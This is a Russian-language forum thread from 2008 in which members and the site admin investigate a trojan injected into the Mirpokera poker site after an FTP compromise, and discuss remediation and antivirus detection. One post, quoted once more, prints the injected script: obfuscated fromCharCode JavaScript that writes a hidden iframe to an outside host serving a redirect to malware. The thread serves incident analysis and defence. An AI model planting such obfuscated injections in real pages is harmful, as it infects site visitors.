Регистрация
Регистрация Поиск Сообщество  
CGM > Покер > Программы и железо для игроков > Программное обеспечение
Опции темы

Троян на Мире покера

Важные объявления
Старый 24.02.2008, 00:21   #21 (permalink)
Бессмертный
 
Аватар для Galina Galanova
 
Регистрация: 04.12.2007
Сообщений: 5,065
Отправить сообщение для Galina Galanova с помощью ICQ Отправить сообщение для Galina Galanova с помощью Skype™
Очень странно, у меня антивирус - avast и doktor Web, ничего не находят, я часто хожу на этот сайт, проверялась 30 минут назад.. :? , специально заходила,все чисто!
Galina Galanova вне форума      
Старый 24.02.2008, 00:46   #22 (permalink)
Бессмертный
 
Аватар для Zedmor
 
Регистрация: 11.03.2004
Адрес: Philadelphia, USA
Сообщений: 3,144
Отправить сообщение для Zedmor с помощью ICQ Отправить сообщение для Zedmor с помощью Skype™
Люди, а вы не могли бы спросить службу поддержки антивируса, который выдает это дело (это ведь касперский, так?) на тему того, почему это происходит?

Я выложил тут ответ на GET запрос, скрипты со страницы. Хотелось бы понять, почему срабатывает антивирус. На главке точно нет никакого юзерского контента и все, что выдает сервер доступно любому, хочется понять на что срабатывает антивирус и не сделал ли кто фишинг мирор сайта, например, заспуфил днсы и давай народ туда заводить, тогда это надо бы пресечь.

Такого линка нигде нет на странице, можете сами проверить, так что если антивирус продолжает срабатывать скажите мне точную версию и название, мы сами тут будем тестить.
Zedmor вне форума      
Старый 24.02.2008, 00:47   #23 (permalink)
Ветеран
 
Аватар для droopy
 
Регистрация: 28.03.2004
Сообщений: 1,248
Отправить сообщение для droopy с помощью ICQ
На главной странице (дальше не проверял), внедрен вредоносный код
Код:
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,104,111,119,116,111,111,116,104,46,99,111,109,47,104,101,108,112,47,99,115,115,47,100,111,99,47,114,117,49,116,114,46,103,105,102,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62))</script>
После расшифровки имеем:
Код:
<iframe src="http://howtooth.com/help/css/doc/ru1tr.gif" style="display:none"></iframe>
картинка ru1tr.gif по сути является скриптом, который и перанаправляет юзера на сайт web-money.cn
2Zedmor: читал у тебя на сайте, что вашей команде требовались грамотные админы/программисты, писал тебе в аську, но ответа не получил
хотел предложить свои услуги.
__________________
Всякий слышит лишь то, что понимает.
droopy вне форума      
Старый 24.02.2008, 00:56   #24 (permalink)
Бессмертный
 
Аватар для Zedmor
 
Регистрация: 11.03.2004
Адрес: Philadelphia, USA
Сообщений: 3,144
Отправить сообщение для Zedmor с помощью ICQ Отправить сообщение для Zedmor с помощью Skype™
Цитата:
Сообщение от DROOPY писал вс, 24 февраля 2008 00:47
писал тебе в аську, но ответа не получил
хотел предложить свои услуги.
Теперь получишь 100% пиши сейчас плиз.

p.s. В итоге выяснилось, что изначальное сообщение отфильровалось антиспамом из-за урла в сообщении ;((
Zedmor вне форума      
Старый 24.02.2008, 00:59   #25 (permalink)
Бессмертный
 
Аватар для Galina Galanova
 
Регистрация: 04.12.2007
Сообщений: 5,065
Отправить сообщение для Galina Galanova с помощью ICQ Отправить сообщение для Galina Galanova с помощью Skype™
Цитата:
Сообщение от DROOPY писал вс, 24 февраля 2008 00:47
На главной странице (дальше не проверял), внедрен вредоносный код
Код:
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,104,111,119,116,111,111,116,104,46,99,111,109,47,104,101,108,112,47,99,115,115,47,100,111,99,47,114,117,49,116,114,46,103,105,102,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62))</script>
После расшифровки имеем:
Код:
<iframe src="http://howtooth.com/help/css/doc/ru1tr.gif" style="display:none"></iframe>
картинка ru1tr.gif по сути является скриптом, который и перанаправляет юзера на сайт web-money.cn
2Zedmor: читал у тебя на сайте, что вашей команде требовались грамотные админы/программисты, писал тебе в аську, но ответа не получил
хотел предложить свои услуги.
Это конечно "нормально", предложить услуги ...
А что мне скажешь? У меня вирус не определяется! :?
Galina Galanova вне форума      
Старый 24.02.2008, 01:11   #26 (permalink)
Бессмертный
 
Аватар для Zedmor
 
Регистрация: 11.03.2004
Адрес: Philadelphia, USA
Сообщений: 3,144
Отправить сообщение для Zedmor с помощью ICQ Отправить сообщение для Zedmor с помощью Skype™
Хрень эту мы уберем с сайта, Друпи, если он согласится, наймем админом по безопасности.
Пока ясно, что кто-то получил доступ или к ftp или к руту и дописал в index.php в конец одной из строчек бяку, причем так, что при просмотре/редактировании ее не видно было, пароли поменяем и будем искать пути как смогли получить доступ к серверу.
Zedmor вне форума      
Старый 24.02.2008, 03:21   #27 (permalink)
Бессмертный
 
Аватар для Zedmor
 
Регистрация: 11.03.2004
Адрес: Philadelphia, USA
Сообщений: 3,144
Отправить сообщение для Zedmor с помощью ICQ Отправить сообщение для Zedmor с помощью Skype™
В результате проведенного исследования, выяснилось, что злоумышленники получили доступ к ftp и поменяли содержимое файла index.php в корне, добавив вредоносный код. К сожалению, точных сведений относительно того, как они получили пароль к фтп нет, скорее всего сканированием трафика в сети, затроянив один из компьютеров в сетке, где стоит сервер.

Так как мы точно не знаем, что еще могли сделать злоумышленники мы просим всех игроков на мирпокера поменять палоли к сайту. Мы напишем скриптик завтра, который каждого юзера попросит поменять пароли в обязательном порядке.

Мы очень сожалеем о случившемся и хотим сообщить, что:

1. Мы попросили DROOPY работать с нами и он будет заниматься безопасностью сайта.2
2. Мы проведем полную ревизию сайта, скриптов на сайте и других наших сайтов на предмет сетевой безопасности.
3. Мы будем использовать вместо небезопасного FTP в котором пароль передается в открытом виде, безопасный sFTP.

Мы будем держать в курсе всех, относительно развития событий. Есть еще кое-какие вещи, которые я не хочу пока озвучивать, но позже обязательно сообщу. Это не касается безопасности сервера в данный момент и в будущем.
Zedmor вне форума      
Старый 24.02.2008, 03:49   #28 (permalink)
Ветеран
 
Аватар для DemoN
 
Регистрация: 02.10.2006
Сообщений: 1,220
Ну блииин, а че теперь делать то? У меня нод32+Аутпост стоит, заходил неоднократно - было тихо.
__________________
All in all you're just another brick in the wall
DemoN вне форума      
Старый 24.02.2008, 03:56   #29 (permalink)
Бессмертный
 
Аватар для Zedmor
 
Регистрация: 11.03.2004
Адрес: Philadelphia, USA
Сообщений: 3,144
Отправить сообщение для Zedmor с помощью ICQ Отправить сообщение для Zedmor с помощью Skype™
Цитата:
Сообщение от DemoN писал вс, 24 февраля 2008 03:49
Ну блииин, а че теперь делать то? У меня нод32+Аутпост стоит, заходил неоднократно - было тихо.
Вредоносный код внедрили 19го числа в 17 часов. Также неизвестно работал ли сайт, на который вела ссылка и реально ли выдавался ли где-то троян.

Еще хочу сказать спасибо форумчанам за оперативное сообщение по этому поводу.

Да, если кто захочет поучаствовать в расследовании причин - велкам. Обсудим это дело.
Zedmor вне форума      
Старый 24.02.2008, 04:06   #30 (permalink)
Ветеран
 
Аватар для droopy
 
Регистрация: 28.03.2004
Сообщений: 1,248
Отправить сообщение для droopy с помощью ICQ
Всем, у кого не определился этот троян, советую отправить приведенный мной код разработчикам вашего антивируса (обычно есть такая возможность на их сайте), я сейчас это сделаю для DrWEB, обновление обычно выходит в течение нескольких часов.
ЗЫ: зловредный код с сайта я удалил.
__________________
Всякий слышит лишь то, что понимает.
droopy вне форума      
Старый 24.02.2008, 05:17   #31 (permalink)
Энтузиаст
 
Регистрация: 30.08.2007
Адрес: Moscow
Сообщений: 366
Отправить сообщение для DruidMoo с помощью ICQ
Лучше расскажите тем, у кого антивирус троян не выявил - признаки, по которым его можно "вручную" найти ...
У меня NAV360 и KAV его не видят. Может его и нет, но ..
__________________
Люди, которые думают, что они знают всё на свете, раздражают нас - людей, которые действительно всё на свете знают.
DruidMoo вне форума      
Старый 24.02.2008, 05:32   #32 (permalink)
Бессмертный
 
Аватар для ProzAk-R
 
Регистрация: 25.09.2006
Адрес: Kiroff
Сообщений: 3,556
У меня сейчас оооочень активная переписка с Лаб Касперского - в том чилсе отправил туда и этот код. Жду ответа .
__________________
Среди увлекающихся азартной игрой нет пессимистов. Акутагава Рюноскэ. Обучение МТТ
ProzAk-R вне форума      
Старый 24.02.2008, 05:40   #33 (permalink)
Ветеран
 
Аватар для droopy
 
Регистрация: 28.03.2004
Сообщений: 1,248
Отправить сообщение для droopy с помощью ICQ
цепочка работы трояна была такая
mirpokera->[Зарегистрироваться?]>[Зарегистрироваться?]
в конце цепочки сейчас кроме смайлика ^_~ ничего нет
правда есть вероятность, что скрипт проверяет параметры заголовка http запроса и кому попало трояна не пихает, а только если находит тип браузера необходимой версии.
А тем у кого не определился могу только сказать, что уже много раз видел подобную схему: <script>document.write(String.fromCharCode(чис а))</script > с редиректом через промежуточный сайт, так что ищите в коде страницы подстроку ".fromCharCode"
__________________
Всякий слышит лишь то, что понимает.
droopy вне форума      
Старый 24.02.2008, 05:43   #34 (permalink)
Бессмертный
 
Аватар для ProzAk-R
 
Регистрация: 25.09.2006
Адрес: Kiroff
Сообщений: 3,556
у меня его (сообщения) не было, да. На сайт заходил несколько раз и до темы, и после. В Общих вопросах есть тема про новую книгу - DROOPY, посмотри . Вот там мой антивирус кричал как ошпаренный. Я о сайте по ссылке.
__________________
Среди увлекающихся азартной игрой нет пессимистов. Акутагава Рюноскэ. Обучение МТТ
ProzAk-R вне форума      
Старый 24.02.2008, 06:03   #35 (permalink)
Ветеран
 
Аватар для droopy
 
Регистрация: 28.03.2004
Сообщений: 1,248
Отправить сообщение для droopy с помощью ICQ
Да и там троян, но другой и внедрен очень тупо в начало страницы, а не в середину, как на mirpokera
он у меня образался модулем удаления рекламы outpost
[Зарегистрироваться?]
но механизм шифровки очень продвинутый, такие шифровщики обычно пишутся на заказ и продаются
ЗЫ: не кликайте на ссылки, которые я приводил... сейчас исправлю
написал abuse request на этот домен, владельцы пока скрыты
Цитата:
Сообщение от Цитата:
Email Sent

We have received your complaint and have forwarded the same to our Abuse Department.

If this domain name is determined to be involved in the specified illegal activity, we would disable Privacy Protection Service for this domain name and take appropriate action against this domain name.
__________________
Всякий слышит лишь то, что понимает.
droopy вне форума      
Старый 24.02.2008, 08:03   #36 (permalink)
Увлечённый
 
Аватар для InFlammable
 
Регистрация: 07.02.2007
Адрес: Киев
Сообщений: 563
DROOPY, подскажи плз, у меня НОД молчал при заходе на мирпокера, но я недавно стал юзать плагин NoScript в Firefox, который по умолчанию блокирует все скрипты любого сайта, пока вручную не разрешишь. Этот плагин спасает от подобных проблем?
__________________
when i bet i either have nuts or balls
InFlammable вне форума      
Старый 24.02.2008, 08:19   #37 (permalink)
Ветеран
 
Аватар для droopy
 
Регистрация: 28.03.2004
Сообщений: 1,248
Отправить сообщение для droopy с помощью ICQ
Цитата:
Сообщение от InFlammable писал вс, 24 февраля 2008 11:03
DROOPY, подскажи плз, у меня НОД молчал при заходе на мирпокера, но я недавно стал юзать плагин NoScript в Firefox, который по умолчанию блокирует все скрипты любого сайта, пока вручную не разрешишь. Этот плагин спасает от подобных проблем?
В данных конкретных случаях плагин бы помог, но есть возможность впаривать троянов и без javascript, так что не панацея.
Ну и в настоящее время многие сайты с отключенным javascript будут просто неработоспособны, что конечно не делает чести их создателям.
ЗЫ: возможно не все внимательно прочитали, хоть это только моё предположение, что троян пытается активироваться только при открытии зараженного сайта определенной (уязвимой) версией браузера, обычно при запросе страницы браузер сообщает серверу свою версию. Возможно по этому у многих антивирус и не реагировал... А может это просто мои фантазии, хотя это легко реализуемо.
__________________
Всякий слышит лишь то, что понимает.
droopy вне форума      
Старый 24.02.2008, 12:56   #38 (permalink)
Энтузиаст
 
Аватар для DickTracy
 
Регистрация: 19.02.2006
Адрес: Омск
Сообщений: 380
Цитата:
Сообщение от bigwetbutts писал вс, 24 февраля 2008 00:12
Точно помню что троян дал о себе знать именно на вашем сайте.
Все точно также. Ко мне пролез троян. Понял я это по появившимся сообщениям о сертификации сайта *.wmtransfer.com при заходе на любой сайт. Первый раз оно появилось именно на мирепокера.
Вроде удалил антируткитом.
DickTracy вне форума      
Старый 24.02.2008, 13:16   #39 (permalink)
Энтузиаст
 
Аватар для Prolim
 
Регистрация: 17.11.2007
Адрес: Питер
Сообщений: 368
2Droopy

Добрый день. У меня вопрос по поводу трояна.
У меня на компе есть постоянный антивирус авира, работающий всегда и запрещающий опасные процессы. Так же есть ещё два антивируса, которыми я периодически проверяю систему. На мирпокера я бывал почти каждый день, вчера после прочтения здесь темы целый день сканил комп всеми антивирусами, но все промолчали. Так вопрос у меня такой: возможно ли, что если будет известно имя зараженного файла, то его можно будет найти через полный поиск по системе и потом удалить вручную (а имя нам могут сообщить у кого антивирус его опознал), или это не подействует?

Заранее спасибо
Prolim вне форума      
Старый 24.02.2008, 14:52   #40 (permalink)
Интересующийся
 
Регистрация: 27.04.2004
Сообщений: 93
У меня вчера при заходе на мирпокера KIS обнаружил:
обнаружено: троянская программа Trojan-Downloader.JS.Agent.abs URL: [Зарегистрироваться?]
Yury вне форума      

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Звезды покера: лучшие и знаменитые игроки покера в мире Farel Биографии и обсуждение игроков 0 15.03.2014 21:32
Сегодняшний рынок вакансий в мире покера OldBoy Новости, статьи, репортажи.. 0 31.05.2011 18:58
покупка всех водов на мире покера TakeItEasy Около покерного стола 15 05.03.2011 05:28



Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.

Быстрый переход
Правила форумов CGM Контакты Справка Обратная связь CGM.ru Архив Вверх Главная
 
Использование материалов сайта разрешено только при наличии активной ссылки на источник.
Все права на картинки и тексты принадлежат Информационному агентству CGM и их ПАРТНЕРАМ. Политика конфидециальности
CGM.ru на Youtube CGM.ru на Google+ CGM.ru в Twitter CGM.ru на Facebook CGM.ru в vKontakte CGM.ru в Instagram

В сотрудничестве с Pokeroff.ru
Текущее время: 17:42. Часовой пояс GMT +3.
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot